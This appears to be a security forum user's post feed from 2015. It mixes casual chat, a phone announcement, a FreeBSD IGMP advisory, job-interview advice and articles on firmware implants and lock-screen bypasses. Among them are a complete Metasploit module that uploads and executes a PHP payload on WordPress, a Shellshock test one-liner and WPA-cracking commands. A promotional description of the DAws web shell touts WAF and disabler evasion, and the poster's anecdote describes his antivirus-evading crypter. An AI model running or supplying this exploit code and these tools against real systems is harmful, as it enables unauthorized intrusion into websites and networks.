Everything posted by Nytro
Many happy returns, man, buy me a whiskey when I get to Bucharest, you know, like in the good old days
I look forward to your achievements.
I fixed the problem with the Dislikes.
Allview introduces X2 Soul PRO, its new flagship
Aurelian Mihai - 3 Mar 2015

Present at the Mobile World Congress exhibition in Barcelona, Allview unveiled X2 Soul PRO, a new high-end smartphone for the Romanian market. Allview X2 Soul PRO keeps the design trend of the SOUL range, trying to convince through the performance of its 64-bit octa-core processor, 5.2" Full HD screen and 13MP and 8MP cameras. The new handset runs Android 5.0 Lollipop.

"X2 Soul PRO is a device that inspires the senses and adapts its UI colours to the surrounding environment. Pleasant to touch and to look at, the smartphone will pleasantly surprise both through its performance and through its functions," says Lucian Peticilă, the company's General Manager.

X2 Soul PRO comes in a unibody case, 5.5 mm thick, built from metal and scratch-resistant glass. The exterior design is highlighted by the chrome lines of the frame and the combination of curves with flat surfaces. The internal chassis is made of an aluminium and magnesium alloy, offering a good mechanical strength / weight ratio. Inside we find a 2700 mAh battery, sized for an autonomy of up to 11 days in stand-by or 13 hours of talk time. Helped by the "Super Power Saving" mode, the phone promises to offer over 100 hours of use per battery charge.

Built using Full Lamination technology, the Full HD screen with 442 ppi density promises generous viewing angles and good image quality. Besides commands taken through the touch interface, Allview X2 Soul PRO also supports gesture control, offering a convenient way to access basic functions.

The 13MP main camera, a Sony IMX214 model with 6 lenses, is managed with the help of a capture application that includes functions such as Magic Focus, Tracks, Best Face, Best Image, Eraser, Professional mode or the possibility of separating focus from exposure. Similarly, the 8MP front camera can be used for video calls and selfies, having all the filters mentioned above. The configuration is completed with 2GB of RAM and a Mali-T760 MP2 GPU running at 700MHz, two SIM card slots and 4G connectivity, working in the LTE FDD and TDD standards.

The Allview X2 Soul PRO phone is available starting today on pre-order at a price of 1699 lei.

Source: Allview introduces X2 Soul PRO, its new flagship

Nice work.
The scheme by which two Romanians stole a fortune via Internet Banking
Nytro replied to ZeroDoi's topic in Security news
So what did they do illegally?
You need to know OOP well. I think that's the basic criterion. Read everything here: PHP: Classes and Objects - Manual, or look for articles on this topic. You need to know how to write some SELECTs, a JOIN and an INSERT. You need to know HTML5/CSS3/JS/jQuery - at least the basics: tags/rules/basic notions/selectors... Also look over a framework. I'd suggest Zend, but I'm no expert. Maybe @Birkoff can help you.
Bring arguments too.
Intercepting functions from statically linked libraries
Nytro posted a topic in Tutorials in English
Intercepting functions from statically linked libraries
January 28, 2015 Ionut Popescu

A common technique for blackbox penetration testing of a binary application is intercepting function calls. This technique helps the pentester to properly understand how the application works and to manipulate application data.

The problem

In most cases, it is pretty easy to intercept a function call: the application calls a function from a shared library (DLL) and you just need to find its address in the DLL's export address table and breakpoint on it. But it may happen that your target function is from a statically linked library, which means that you cannot find its address by name in the export table. So how to find the target function's address in this situation?

In our case, we have a Windows executable statically linked with OpenSSL and we want to intercept and modify the TLS encrypted traffic which is handled by the SSL_write function from OpenSSL. However, the same idea can be applied for other operating systems and libraries.

Source: Intercepting functions from statically linked libraries – Security Café
1. Both - the important applications exist for both platforms
2. Java - Android specific
3. Objective C - iOS specific
You'd be surprised to find out which companies people from here, or former members, work at.
FreeBSD Security Advisory - IGMP Integer Overflow
Authored by Marek Kroemeke, Mateusz Kocielski | Site security.freebsd.org

FreeBSD Security Advisory - An integer overflow in computing the size of IGMPv3 data buffer can result in a buffer which is too small for the requested operation. An attacker who can send specifically crafted IGMP packets could cause a denial of service situation by causing the kernel to crash.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

=============================================================================
FreeBSD-SA-15:04.igmp                                       Security Advisory
                                                          The FreeBSD Project

Topic:          Integer overflow in IGMP protocol
Category:       core
Module:         igmp
Announced:      2015-02-25
Credits:        Mateusz Kocielski, Logicaltrust, Marek Kroemeke, and
                22733db72ab3ed94b5f8a1ffcde850251fe6f466
Affects:        All supported versions of FreeBSD.
Corrected:      2015-02-25 05:43:02 UTC (stable/10, 10.1-STABLE)
                2015-02-25 05:56:16 UTC (releng/10.1, 10.1-RELEASE-p6)
                2015-02-25 05:56:16 UTC (releng/10.0, 10.0-RELEASE-p18)
                2015-02-25 05:43:02 UTC (stable/9, 9.3-STABLE)
                2015-02-25 05:56:54 UTC (releng/9.3, 9.3-RELEASE-p10)
                2015-02-25 05:43:02 UTC (stable/8, 8.4-STABLE)
                2015-02-25 05:56:54 UTC (releng/8.4, 8.4-RELEASE-p24)
CVE Name:       CVE-2015-1414

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:https://security.FreeBSD.org/>.

I.   Background

IGMP is a control plane protocol used by IPv4 hosts and routers to
propagate multicast group membership information. IGMP version 3 is
implemented on FreeBSD.

II.  Problem Description

An integer overflow in computing the size of IGMPv3 data buffer can
result in a buffer which is too small for the requested operation.

III. Impact

An attacker who can send specifically crafted IGMP packets could cause
a denial of service situation by causing the kernel to crash.

IV.  Workaround

Block incoming IGMP packets by protecting your host/networks with a
firewall.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-15:04/igmp.patch
# fetch https://security.FreeBSD.org/patches/SA-15:04/igmp.patch.asc
# gpg --verify igmp.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/8/                                                         r279263
releng/8.4/                                                       r279265
stable/9/                                                         r279263
releng/9.3/                                                       r279265
stable/10/                                                        r279263
releng/10.0/                                                      r279264
releng/10.1/                                                      r279264
- -------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NNNNNN with the revision number, on a
machine with Subversion installed:

# svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NNNNNN with the revision number:

<URL:https://svnweb.freebsd.org/base?view=revision&revision=NNNNNN>

VII. References

<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1414>

The latest revision of this advisory is available at
<URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-15:04.igmp.asc>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.1.1 (FreeBSD)

iQIcBAEBCgAGBQJU7WjDAAoJEO1n7NZdz2rnjr8QAL0J0+4lRtPXRyDRX2xFSnzw
sc3OpfmlTiD3pCFkebTYy3/+EK86iAL1ZELqlJe5mm2+pzhCQB13C4/exc0l1U6b
tyiGXxhVi2/4SBrs6n9lmB/YhXkgtqaOQAcNaOD6sVbS1e5cBtjnG86oOq8tQ2qG
c7Dvh3HTp9M5fDJtsI40SIpqy3FcKORBfpjYd8jONfSqMnLM2kM8xzwHSv4/X23e
GlDKHtIi+1ylD/Qu7Z3S7hqXDTSYjZb1QHc7axDFB6X6nj2Rz3aWS2hPPTypFd3T
zTj5DZjgiP7U2LhR40sWW68RYi21yzNUwbe0w5LeDah6Ymc5CDO2ujdm3HDQbQGH
pA9QIOjzpgR64nWLIJfZ7jMxL3rCCaCW3NCB/iRXni2Ib/wt3ZDkJyEk/SF4K82H
72U2u2qVjAsnhmwWK8gksBi9bEXk3TnX778bkrwm4rt1xOjACq8k66LAernoE4tB
DkE0pO4QR+6XwFb5sJMG/3L9CmrhTp2pkPDBQDbSD+ngBs5V5mJOqVf7gB+UptnN
Fh8OACO/5KtDkqBDsCljHxHZNaboVF4Q613+iF5CUc6SYOTkLnBDUE4Pq38vlzVB
GdZMEo/hvsCbR4c2TmdKuvEkEqayxCxcv0DXiyTlVCecxSkaYvMXPwCKK43QtS7S
het83QCUxaVuxLiznuwR
=lkYC
-----END PGP SIGNATURE-----

Source: http://packetstormsecurity.com/files/130557
Is your interview tomorrow? I haven't been to Bitdefender, but I've been to Avira. The position was C++ Developer, but that doesn't mean you'll be touching the scanning engine; the position is probably for auxiliary tools: backup, password manager or whatever else. My interview had two stages (I think): 1. The technical "interview" 2. The discussions. The "technical interview" was: you have a computer with Visual C++ and an internet connection. Write a TCP client that connects to a TCP server, and a TCP server that supports multiple clients and responds to requests. I had 3 hours available, and for "maximum score" it had to support multiple clients, multi-threading, select()... Anyway, the point is that I did everything that was needed; in any case, where I had worked before I had done such things, and it was very easy for me. In the second part, though, I sat and talked with two people from there. I think they also asked me technical questions, probably about C++ and maybe algorithms, I don't know if about anything else. The weird part was that they asked me what projects I had worked on and I told them I had made a crypter. Naturally, they didn't know what that was and I explained what it does: "Well, you see, it makes a file that is detectable by antivirus no longer detectable by antivirus." They didn't believe me. I explained how it works: "Well, you see, it loads an executable into memory and runs it without it ever touching the disk." They still didn't believe it, they said their antivirus knows about these things... Anyway. Then they ask me: "Listen, why would we hire you, if you'd use the antivirus source code to keep making crypters?" And I answer them, half laughing: "Well, you see, I don't need the antivirus source code to do something like that." They never called me back. tl;dr: Know OOP well: virtual functions, classes, inheritance and whatnot, and know algorithms reasonably well. Note: You get a lot of bonus points if you have connections there.
https://access.redhat.com/articles/1200223
env X='() { (a)=>\' bash -c 'echo $(date)'; It works...
Doesn't seem to work.
./clean Stop swearing at each other.
Bypassing Windows Lock Screen via Flash Screensaver
February 23, 2015 Adrian Furtuna

We have recently discovered an easy method to bypass the Windows Lock screen when a flash screensaver is running. The method allows an attacker to gain unauthorized access to a user's Windows session if he has physical access to a locked machine.

Background info

When a user leaves his computer (ex. during a lunch break), he should lock his session in order to prevent other people from doing actions on his behalf. Some computers, mostly in corporate environments, are configured to play a flash animation as screensaver while the computer is locked. This configuration is done by specifying a path to a .scr file that should be played by the flash player – using the following registry key: HKEY_USERS\.DEFAULT\Control Panel\Desktop\SCRNSAVE.EXE

Full article: http://securitycafe.ro/2015/02/23/bypassing-windows-lock-screen-via-flash-screensaver/
WordPress Admin Shell Upload
Authored by Rob Carr | Site metasploit.com

This Metasploit module will generate a plugin, pack the payload into it and upload it to a server running WordPress providing valid admin credentials are used.

```ruby
##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex/zip'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FileDropper
  include Msf::HTTP::Wordpress

  def initialize(info = {})
    super(update_info(
      info,
      'Name'           => 'WordPress Admin Shell Upload',
      'Description'    => %q{
        This module will generate a plugin, pack the payload into it
        and upload it to a server running WordPress providing valid
        admin credentials are used.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [
        'Rob Carr <rob[at]rastating.com>' # Metasploit module
      ],
      'DisclosureDate' => 'Feb 21 2015',
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [['WordPress', {}]],
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        OptString.new('USERNAME', [true, 'The WordPress username to authenticate with']),
        OptString.new('PASSWORD', [true, 'The WordPress password to authenticate with'])
      ], self.class)
  end

  def username
    datastore['USERNAME']
  end

  def password
    datastore['PASSWORD']
  end

  def generate_plugin(plugin_name, payload_name)
    plugin_script = %Q{<?php
/**
 * Plugin Name: #{plugin_name}
 * Version: #{Rex::Text.rand_text_numeric(1)}.#{Rex::Text.rand_text_numeric(1)}.#{Rex::Text.rand_text_numeric(2)}
 * Author: #{Rex::Text.rand_text_alpha(10)}
 * Author URI: http://#{Rex::Text.rand_text_alpha(10)}.com
 * License: GPL2
 */
?>}

    zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
    zip.add_file("#{plugin_name}/#{plugin_name}.php", plugin_script)
    zip.add_file("#{plugin_name}/#{payload_name}.php", payload.encoded)
    zip
  end

  def exploit
    fail_with(Failure::NotFound, 'The target does not appear to be using WordPress') unless wordpress_and_online?

    print_status("#{peer} - Authenticating with WordPress using #{username}:#{password}...")
    cookie = wordpress_login(username, password)
    fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil?
    print_good("#{peer} - Authenticated with WordPress")

    print_status("#{peer} - Preparing payload...")
    plugin_name = Rex::Text.rand_text_alpha(10)
    payload_name = "#{Rex::Text.rand_text_alpha(10)}"
    payload_uri = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php")
    zip = generate_plugin(plugin_name, payload_name)

    print_status("#{peer} - Uploading payload...")
    uploaded = wordpress_upload_plugin(plugin_name, zip.pack, cookie)
    fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless uploaded

    print_status("#{peer} - Executing the payload at #{payload_uri}...")
    register_files_for_cleanup("#{payload_name}.php")
    register_files_for_cleanup("#{plugin_name}.php")
    send_request_cgi({ 'uri' => payload_uri, 'method' => 'GET' }, 5)
  end
end
```

Source: WordPress Admin Shell Upload ≈ Packet Storm
Cracking WPA WPA2 with Kali Linux (verbal step by step guide)

This is a full verbal step by step guide on how to crack WPA and WPA2 encrypted passwords using the aircrack-ng suite on Kali Linux. If you are using VMware, VirtualBox, or any virtualization application you will need to use an external USB WIFI card capable of packet injection. The WIFI card I use with and without my VMware is listed below.

USE ctrl+c TO STOP THE PROGRAM AND GET YOUR COMMAND PROMPT BACK

My Wireless card: Alfa Networks AWUS036NHA (you can buy this card online for around $25 - $40)

To check if your card can do packet injection, after creating the monitor mode interface open a terminal and type in: aireplay-ng -9 mon0
This will tell you your percentage of injection. OR check out http://www.aircrack-ng.org/doku.php?i... http://www.aircrack-ng.org/doku.php?i...

WPA - WPA2 wordlist -- Let me google that for you
Hello everyone,

About

There are multiple things that make DAws better than every Web Shell out there:
- Supports CGI by dropping Bash Shells (for Linux) and Batch Shells (for Windows).
- Bypasses WAFs, Disablers and Protection Systems; DAws isn't just about using a particular function to get the job done, it uses up to 6 functions if needed, for example, if shell_exec was disabled it would automatically use exec or passthru or system or popen or proc_open instead, same for Downloading a File from a Link, if Curl was disabled then file_get_content is used instead and this Feature is widely used in every section and function of the shell. (Yes, it bypasses Suhosin too)
- Automatic Encoding; DAws randomly and automatically encodes most of your GET and POST data using XOR (Randomized key for every session) + Base64 (We created our own Base64 encoding functions instead of using the PHP ones to bypass Disablers) which will allow your shell to Bypass pretty much every WAF out there.
- Advanced File Manager; DAws's File Manager contains everything a File Manager needs and even more but the main Feature is that everything is dynamically printed; the permissions of every File and Folder are checked, now, the functions that can be used will be available based on these permissions, this will save time and make life much easier.
- Tools: DAws holds a bunch of useful tools such as "bpscan" which can identify usable and unblocked ports on the server within a few minutes which can later on allow you to go for a bind shell for example.
- Everything that can't be used at all will be simply removed so Users do not have to waste their time. We're for example mentioning the execution of c++ scripts when there's no c++ compilers on the server (DAws would have checked for multiple compilers in the first place), in this case, the function would be automatically removed and the User would know.
- Supports Windows and Linux.
- Open Source.

Extra Info
- Directory Roaming: DAws checks, within the `web` directory, for a Writable and Readable Directory which will then be used to Drop and Execute needed scripts which will guarantee their success.
- Eval Form: `include`, `include_once`, `require` or `require_once` are being used instead of PHP `eval` to bypass Protection Systems.
- Download from Link - Methods: PHP Curl, File_put_content
- Zip - Methods: Linux: Zip; Windows: Vbs Script
- Shells and Tools: Extra: `nohup`, if installed, is automatically used for background processing.

Updates: DAws is always getting updated, I guess that's enough for this part Lol.

Credits: dotcppfile, Aces

Source: https://github.com/dotcppfile/DAws
How the NSA's Firmware Hacking Works and Why It's So Unsettling
By Kim Zetter 02.22.15

One of the most shocking parts of the recently discovered spying network Equation Group is its mysterious module designed to reprogram or reflash a computer hard drive's firmware with malicious code. The Kaspersky researchers who uncovered this said its ability to subvert hard drive firmware—the guts of any computer—"surpasses anything else" they had ever seen.

The hacking tool, believed to be a product of the NSA, is significant because subverting the firmware gives the attackers God-like control of the system in a way that is stealthy and persistent even through software updates.

The module, named "nls_933w.dll", is the first of its kind found in the wild and is used with both the EquationDrug and GrayFish spy platforms Kaspersky uncovered. It also has another capability: to create invisible storage space on the hard drive to hide data stolen from the system so the attackers can retrieve it later. This lets spies like the Equation Group bypass disk encryption by secreting documents they want to seize in areas that don't get encrypted.

Kaspersky has so far uncovered 500 victims of the Equation Group, but only five of these had the firmware-flashing module on their systems. The flasher module is likely reserved for significant systems that present special surveillance challenges. Costin Raiu, director of Kaspersky's Global Research and Analysis Team, believes these are high-value computers that are not connected to the internet and are protected with disk encryption.

Here's what we know about the firmware-flashing module.

How It Works

Hard drive disks have a controller, essentially a mini-computer, that includes a memory chip or flash ROM where the firmware code for operating the hard drive resides.
When a machine is infected with EquationDrug or GrayFish, the firmware flasher module gets deposited onto the system and reaches out to a command server to obtain payload code that it then flashes to the firmware, replacing the existing firmware with a malicious one. The researchers uncovered two versions of the flasher module: one that appears to have been compiled in 2010 and is used with EquationDrug and one with a 2013 compilation date that is used with GrayFish.

The Trojanized firmware lets attackers stay on the system even through software updates. If a victim, thinking his or her computer is infected, wipes the computer's operating system and reinstalls it to eliminate any malicious code, the malicious firmware code remains untouched. It can then reach out to the command server to restore all of the other malicious components that got wiped from the system.

Even if the firmware itself is updated with a new vendor release, the malicious firmware code may still persist because some firmware updates replace only parts of the firmware, meaning the malicious portions may not get overwritten with the update. The only solution for victims is to trash their hard drive and start over with a new one.

The attack works because firmware was never designed with security in mind. Hard disk makers don't cryptographically sign the firmware they install on drives the way software vendors do. Nor do hard drive disk designs have authentication built in to check for signed firmware. This makes it possible for someone to change the firmware. And firmware is the perfect place to conceal malware because antivirus scanners don't examine it. There's also no easy way for users to read the firmware and manually check if it's been altered.

The firmware flasher module can reprogram the firmware of more than a dozen different hard drive brands, including IBM, Seagate, Western Digital, and Toshiba.

"You know how much effort it takes to land just one firmware for a hard drive?
You need to know specifications, the CPU, the architecture of the firmware, how it works," Raiu says. The Kaspersky researchers have called it "an astonishing technical accomplishment and is testament to the group's abilities."

Once the firmware is replaced with the Trojanized version, the flasher module creates an API that can communicate with other malicious modules on the system and also access hidden sectors of the disk where the attackers want to conceal data they intend to steal. They hide this data in the so-called service area of the hard drive disk where the hard disk stores data needed for its internal operation.

Hidden Storage Is the Holy Grail

The revelation that the firmware hack helps store data the attackers want to steal didn't get much play when the story broke last week, but it's the most significant part of the hack. It also raises a number of questions about how exactly the attackers are pulling this off.

Without an actual copy of the firmware payload that gets flashed to infected systems, there's still a lot that's unknown about the attack, but some of it can be surmised.

The ROM chip that contains the firmware includes a small amount of storage that goes unused. If the ROM chip is 2 megabytes, the firmware might take up just 1.5 megabytes, leaving half a megabyte of unused space that can be employed for hiding data the attackers want to steal.

This is particularly useful if the computer has disk encryption enabled. Because the EquationDrug and GrayFish malware run in Windows, they can grab a copy of documents while they're unencrypted and save them to this hidden area on the machine that doesn't get encrypted. There isn't much space on the chip for a lot of data or documents, however, so the attackers can also just store something equally as valuable to bypass encryption.
"Taking into account the fact that their GrayFish implant is active from the very boot of the system, they have the ability to capture the encryption password and save it into this hidden area," Raiu says.

Authorities could later grab the computer, perhaps through border interdiction or something the NSA calls "customs opportunities," and extract the password from this hidden area to unlock the encrypted disk.

Raiu thinks the intended targets of such a scheme are limited to machines that are not connected to the internet and have encrypted hard drives. One of the five machines they found hit with the firmware flasher module had no internet connection and was used for special secure communications.

"[The owners] only use it in some very specific cases where there is no other way around it," Raiu says. "Think about Bin Laden who lived in the desert in an isolated compound—doesn't have internet and no electronic footprint. So if you want information from his computer how do you get it? You get documents into the hidden area and you wait, and then after one or two years you come back and steal it. The benefits [of using this] are very specific."

Raiu thinks, however, that the attackers have a grander scheme in mind. "In the future probably they want to take it to the next level where they just copy all the documents [into the hidden area] instead of the password. [Then] at some point, when they have an opportunity to have physical access to the system, they can then access that hidden area and get the unencrypted docs."

They wouldn't need the password if they could copy an entire directory from the operating system to the hidden sector for accessing later. But the flash chip where the firmware resides is too small for large amounts of data. So the attackers would need a bigger hidden space for storage. Luckily for them, it exists.
There are large sectors in the service area of the hard drive disk that are also unused and could be commandeered to store a large cache of documents, even ones that might have been deleted from other parts of the computer. This service area, also called the reserved area or system area, stores the firmware and other data needed to operate drives, but it also contains large portions of unused space.

An interesting paper (.pdf) published in February 2013 by Ariel Berkman, a data recovery specialist at the Israeli firm Recover, noted "not only that these areas can't be sanitized (via standard tools), they cannot be accessed via anti-virus software [or] computer forensics tools."

Berkman points out that one particular model of Western Digital drives has 141 MB reserved for the service area, but only uses 12 MB of this, leaving the rest free for stealth storage.

To write or copy data to the service area requires special commands that are specific to each vendor and are not publicly documented, so an attacker would need to uncover what these are. But once they do, "[b]y sending Vendor Specific Commands (VSCs) directly to the hard-drive, one can manipulate these [service] areas to read and write data that are otherwise inaccessible," Berkman writes. It is also possible, though not trivial, to write a program to automatically copy documents to this area. Berkman himself wrote a proof-of-concept program to read and write a file of up to 94 MB to the service area, but the program was a bit unstable and he noted that it could cause some data loss or cause the hard drive to fail.

One problem with hiding large amounts of data like this, however, is that its presence might be detected by examining the size of the used space in the service area. If there should be 129 MB of unused space in this sector but there's only 80 MB, it's a dead giveaway that something is there that shouldn't be.
But a leaked NSA document that was written in 2006 but was published by Der Spiegel last month suggests the spy agency might have resolved this particular problem.

NSA Interns to the Rescue

The document (.pdf) is essentially a wish list of future spy capabilities the NSA hoped to develop for its so-called Persistence Division, a division that has an attack team within it that focuses on establishing and maintaining persistence on compromised machines by subverting their firmware, BIOS, BUS or drivers. The document lists a number of projects the NSA put together for interns to tackle on behalf of this attack team. Among them is the "Covert Storage" project for developing a hard drive firmware implant that can prevent covert storage on disks from being detected. To do this, the implant prevents the system from disclosing the true amount of free space available on the disk.

"The idea would be to modify the firmware of a particular hard drive so that it normally only recognizes, say, half of its available space," the document reads. "It would report this size back to the operating system and not provide any way to access the additional space."

Only one partition of the drive would be visible on the partition table, leaving the other partitions—where the hidden data was stored—invisible and inaccessible.

The modified firmware would have a special hook embedded in it that would unlock this hidden storage space only after a custom command was sent to the drive and the computer was rebooted. The hidden partition would then be available on the partition table and accessible until the secret storage was locked again with another custom command.

How exactly the spy agency planned to retrieve the hidden data was unclear from the eight-year-old document. Also unclear is whether the interns ever produced a firmware implant that accomplished what the NSA sought.
But given that the document includes a note that interns would be expected to produce a solution for their project within six months after assignment, and considering the proven ingenuity of the NSA in other matters, they no doubt figured it out.

Source: http://www.wired.com/2015/02/nsa-firmware-hacking/